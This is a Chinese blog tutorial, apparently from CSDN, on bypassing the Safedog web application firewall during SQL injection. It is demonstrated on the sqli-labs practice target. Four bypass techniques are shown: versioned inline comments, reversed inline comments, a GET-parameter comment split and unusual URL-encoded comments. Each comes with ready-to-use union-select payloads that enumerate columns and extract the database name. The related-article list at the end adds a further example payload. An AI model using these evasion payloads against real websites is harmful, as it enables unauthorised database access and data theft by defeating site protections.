SQL注入-绕过安全狗

最新推荐文章于 2025-02-24 13:56:19 发布
最新推荐文章于 2025-02-24 13:56:19 发布
阅读量5.2k 收藏 24
点赞数 1
分类专栏: SQL注入 文章标签: linq 蓝桥杯 gnu web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/LJH1999ZN/article/details/122920922
版权

目录

一、什么是安全狗

二、演示如何绕过安全狗的防护

1.方式一:内联注释正常绕过

 2.方式二:内联反向思维绕过。

3.方式三:GET传参绕过

4.方式四:URL编码绕过

一、什么是安全狗

        网站安全狗是一款集网站内容安全防护、网站资源保护及网站流量保护功能为一体的服务器工具。功能涵盖了网马/木马扫描、防SQL注入、防盗链、防CC攻击、网站流量实时监控、网站CPU监控、下载线程保护、IP黑白名单管理、网页防篡改功能等模块。能够为用户提供实时的网站安全防护,避免各类针对网站的攻击所带来的危害。

二、演示如何绕过安全狗的防护

1.方式一:内联注释正常绕过

1.1 当没有绕过时会显示以下页面

1.2 使用内联注释法

/*!5位数字,但是不能大于版本号 关键字 */ 5位数字中最好包含44

payload:id=1'/*!44444order*/ /*!44444by*/4--+

id=1'/*!44444order*/ /*!44444by*/3--+ 

1.3 使用绕狗方式查询数据

payload:?id=-1' /*!44444 union*//*!44444 select*/1,2,3--+;

判断成功绕过

payload:?id=-1' /*!44444 union*//*!44444 select*/1,database(),3--+  ;

当我们输入database(),发现也会被拦截

此时我们需要将database和()也进行处理

payload:?id=-1' /*!44444 union*//*!44444 select*/1,/*!44444database*//*!44444()*/,3--+

 2.方式二:内联反向思维绕过。

基本格式:/*!5位数6位字符*/ 注释内容

5位数大于版本号,6位字符随便输,注释内容在外边

2.1以sqlilbas-less-1测试,获取数据库

payload:id=-1' /*!84544sansan*/union/*!84544sansan*/select 1,/*!84544sansas*/database/*!84544sansan*/(),3--+

3.方式三:GET传参绕过

基本格式:参数名=/*&id=1&b=*/

3.1 判断列数

payload:?a=/*&id=1' order by 3--+&b=*/ 

a参数和b参数可以是任意字符 

3.2 获取数据库

payload:?s=/*&id=-1' union select 1,database(),2--+&b=*/

4.方式四:URL编码绕过

常见的url编码:

'=%27;"=%22;空格=%20;回车=%0d;换行=%0a;NULL=%00;水平制表=%09;垂直制表=%0b

更多编码查询:http://yige.org/tags/ref_urlencode.php

但是注意,以前可以利用常见的URL编码绕过,但是现在不行,需要使用一些奇怪的URL编码进行绕过;例:%!字母 ,然后用/*URL编码*/做注释 如果一个URL编码不行,可以采用输入多个URL编码

基本格式:关键字/*%!a*/关键字

4.1 判断列数

payload:?id=1' order /*%!a*/ by 4 --+

4.2 获取数据库库名

payload:?id=-1' union  /*%!a*/ select 1,database /*%!a*/ (),2 --+

 

 

 

 

 

 

 

SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细
xt350488的博客
07-16 5414
通过本文的详细解析和实验,我们深入了解了SQL注入攻击的基本原理及其在实际应用中的变种和绕过技巧。在面对如安全狗这样的WAF防护时,攻击者并非束手无策,而是可以通过多种方式绕过检测规则,成功实施SQL注入攻击。本文首先通过基础的SQL注入测试,验证了安全狗WAF对“and 1=1”等简单SQL注入模式的识别能力。随后,通过拆分和注释符的使用,我们发现WAF可能是通过识别特定模式(如“and”后紧跟空格和字符)来拦截SQL注入的。
sql注入绕过安全狗4.0
Bu2n的博客
02-07 5699
1.前言2.前置知识3.绕过关键字主要思路3.1绕过连体关键字思路3.2绕过单个关键字思路4.以sqli-labs(Less-1)为例,绕过安全狗4.1拦截order by4.2拦截union select4.3拦截database()4.4拦截from4.5拦截and4.6查看数据库数据5.面向安全狗4.0的py脚本6.sqli-labs无安全狗全通关payload 1.前言 该文章只进行技术分享与探讨,任何人进行非法操作与作者无关。 2.前置知识 /*!*/叫做内联注释,当!后面所接的数据库版本号时.
SQL注入绕过安全狗
blackguest07的博客
01-12 2665
SQL注入绕过安全狗,内容很详细,本文仅供学习,请勿做一些非法事情,出事与博主无关。
实战中各种SQL注入绕过姿势,从零基础到精通,收藏这篇就够了!
最新发布
Javachichi的博客
02-24 989
这篇文章搜集整理自@Junehck师傅的Github,记录了他在实战中遇到的各种WAF拦截SQL注入的场景和绕过姿势,文章并不是完整的,仅记录了Bypass部分。黑白之道发布、转载的文章中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途及盈利等目的,否则后果自行承担!这也是耗费了大白近四个月的时间,吐血整理,文章非常非常长,觉得有用的话,希望粉丝朋友帮忙点个**「分享」之间用两个 --%0a 会无响应。改为 1,页面返回 3 秒,执行了 3 次,不管输入多少都会被乘 3。
安全狗SQL注入绕过
qq_38675102的博客
02-09 3056
安全狗waf绕过
sql注入绕过安全狗
weixin_48776804的博客
02-15 730
sql注入安全狗
SQL注入绕过安全狗的五种方法
01-11 1532
2,输入 1’ or 1 and 1 --+ (意思是闭合参数tel的单引号,or 1 and 1 让条件结果为真,无论1是否存在都会返回数据,–+ 闭合后面的其他语句)回显页面正常。有我们必火的小女生好看吗?–:表示注释,在mysql中真正的注释是"-- ",这里必须有个空格,否则不是注释,%0a是换行的url编码,换号后,表示重新查询,前面的注释对后面的语句将不再影响,这也要注意,这里红色框处,当url参数出现两个同名参数时,将取最后一个参数的值,所以这里会取后面的tel的值,前面传参/
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL注入-安全狗apache4.0
m0_60716947的博客
05-15 998
目录 一、安全狗的安装 二、Fuzz 三、过狗 (1)and 绕过 (2)order by 绕过 (3)union select 绕过 (4)database() 绕过 (5)获取其他库 (6)获得所有表 (7)获得所有字段 (8)获得数据 四、总结 一、安全狗的安装 这里有一篇很不错的文章,在安装的过程中出现的问题基本都能在里面找到解决方法 安全狗安装_YsterCcc的博客-CSDN博客_安全狗安装 如果还是不行就找一个装了phpstudy老版本的靶机,比如我上次写.
网络安全-sql注入-sqlmap
09-02
比如,一个典型的SQL注入漏洞可能出现在一个简单的登录验证场景中,如果用户名和密码验证的SQL语句没有正确地对用户输入进行处理,攻击者就可以通过输入特定的字符串,使得原本的验证逻辑失效,从而绕过验证。...
记一次艰难的SQL注入(过安全狗)
白帽子凯哥聊黑客
05-29 1694
实战注入的难度比靶场大得多,各种绕过,各种骚操作。要学会利用搜索工具,更要学会选择性放弃。当一条路走不通就换另一种方法,也许就会柳暗花明又一村。网络安全学习资源分享:给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,需要点击下方链接即可前往获取。
绕过安全狗继续注入的思路
08-30
绕过安全狗继续注入的思路。
SQL注入绕过安全狗的waf防火墙,这一篇就够了,8k文案超详细_mysql注入绕waf
baimao__Ch的博客
08-28 1242
WAF(Web应用防火墙)作为一种专为Web应用程序设计的安全防护工具,其核心功能在于通过实施一系列针对HTTP/HTTPS协议的安全策略,来增强Web应用的安全性。WAF内置了精心设计的检测逻辑与规则集,这些规则旨在对每一个进入系统的请求内容进行细致审查,并对任何违反安全策略的请求采取即时且有效的防御措施,从而维护Web应用环境的纯净与安全。从时代发展的角度看,网络安全的知识是学不完的,而且以后要学的会更多,同学们要摆正心态,既然选择入门网络安全,就不能仅仅只是入门程度而已,能力越强机会才越多。
什么,有狗快跑!慢着,这次手把手教你怎么过安全狗!(sql注入篇)
wananxuexihu的博客
07-09 1230
在记忆里上次绕安全狗还是在上次,开开心心把自己之前绕过狗的payload拿出来,发现全部被拦截了,事情一下子就严肃起来了,这就开整。
SQL注入 安全狗绕过
iO快到碗里来
09-24 411
0x00 前言 最近看了几篇关于安全狗 Bypass 的文章,绕过方式五花八门。在此以安全狗 apache4.0.30255 为例,简单做个总结。 0x01 相关知识 /* … */ 在大部分语言中都是一种注释,处于 /* … */ 之中的语句是不被执行的。但 MySQL 为了保证兼容性,比如要求从 mysqldump 导出的 SQL 语句能被其它数据库直接使用,它把一些特有的仅在 MySQL 上能执行的语句放在 /*! … */ 中,这样这些语句在其它数据库中就不会被当作执行语句,但在 MySQL
实战sql注入绕过安全狗
weixin_45901902的博客
08-19 638
实战安全狗bypass 之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站 绕过 and 1=1 这种很显然直接被拦截,这里进行fuzz and 1 like 1 拦截 and /!1=1/ 不拦截 and hex(1) 不拦截 %23%0a 1=1 拦截 绕过order by 发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截 安全狗他拦截哪里我们就绕哪里 order%23%0aby 1 不拦截 order /!by/ 1拦截 .
【WAF剖析】——SQL注入安全狗bypass深度剖析
Demo不是emo的博客
11-23 7157
sql注入不会绕过WAF?关注我,让我带你由简入难实战各个WAF,今天先来看看web安全渗透必会的安全狗WAF,你会绕吗?看我带你将它拿下
sql注入怎么绕过安全狗sqli
01-23
### 绕过安全狗WAF的SQL注入防御机制 #### 安全声明 绕过Web应用防火墙(WAF)的行为仅限于合法授权的安全测试活动,严禁用于任何非法用途。维护互联网环境的安全稳定是每个人的责任。 #### SQL注入绕WAF原理概述 在现代网络安全架构下,尽管WAF能够有效拦截大部分常规SQL注入尝试,但某些特殊编码技术仍可能被利用来规避检测规则[^2]。例如,在构建特定模式下的查询字符串时,通过巧妙运用注释符号与空白字符替代方案相结合的方式,可以在不触发警报的前提下执行恶意指令[^3]。 #### 实际案例分析 具体到安全狗产品版本v4.0所采用的一套防护策略上来看,有一种常见手法是在构造payload过程中引入`/!* !* /`结构作为间隔符代替标准空格,从而改变原始请求格式使其避开内置签名库匹配过程。下面给出一个基于此思路形成的样例URL: ```plaintext http://example.com/vuln_page.php?id=1 UNION /*! SELECT */ 1,2,3 -- ``` 这里的关键在于使用了MySQL特有的语法特性`/*! ... */`,它允许开发者嵌入针对不同数据库引擎优化过的代码片段;当目标服务器运行的是MySQL时,这部分内容会被解析并生效,而在其他情况下则被视为普通注释忽略掉[^5]。 #### 技术细节说明 为了进一步提高成功率,还可以考虑加入更多混淆手段,比如: - 利用大小写混合书写关键词; - 插入多余的括号或运算符扰乱视觉识别逻辑; - 对敏感函数名实施同义转换处理等措施。 需要注意的是,上述方法均需谨慎评估其适用性和潜在风险后再做决定,并始终遵循法律法规框架内行事。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

一句话木马

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值